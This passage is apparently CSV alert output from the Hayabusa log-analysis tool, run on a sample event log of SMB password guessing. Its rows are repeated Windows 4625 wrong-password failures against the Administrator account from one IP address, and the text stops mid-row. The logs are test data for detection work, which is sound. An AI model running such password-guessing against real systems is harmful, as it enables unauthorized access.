2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCqb6TVV14hVX3NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3qJsJrxVARedOdd3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7iNkrkBNEbXPK0B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bio4zciNRolyeHc1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IFf1vN5MgAIsdZvx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zWhgUQSWAycVdYoS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ugHUJZuKHYfUHXWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AUeUmYa72BzHfyhK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ksydur7W1mUoOZAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YNIzopnsXH6OjcUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQljJkaWs8bcaOI1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1jejn6ZMo564m7ok | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KrpBO1SCHpt27CRM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ifPePsozBYRLCU3k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vve4r8QwaMLKrrcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9ArElR5k8yLefWu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4a1Y126C516BaGcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VL7PnrO2dLsEbebQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GGTlLZ8J9f2PtiuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sVwPFs7bhJgJwRt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dgQNHL9etdHdRw9Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjZrWpJlN2CwbxFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72lmrp6neWGKAURB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CnTi5dgoWunYutJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi2fTl07llsJEYyt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hohh8KS1eYtojEya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsuC8F95UmsOSKvs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: be8UJ0EN7XS5r0b6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CgJlVYanwWKAhJ7O | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zthqCIkr1nKtqcCj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tzmi8I402j71q5Wg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m0U3NYl8QEbgeJry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uJJ1FOUIBInGkKPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bu0X5RisszAHEs0X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.370 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.816 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.300 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: 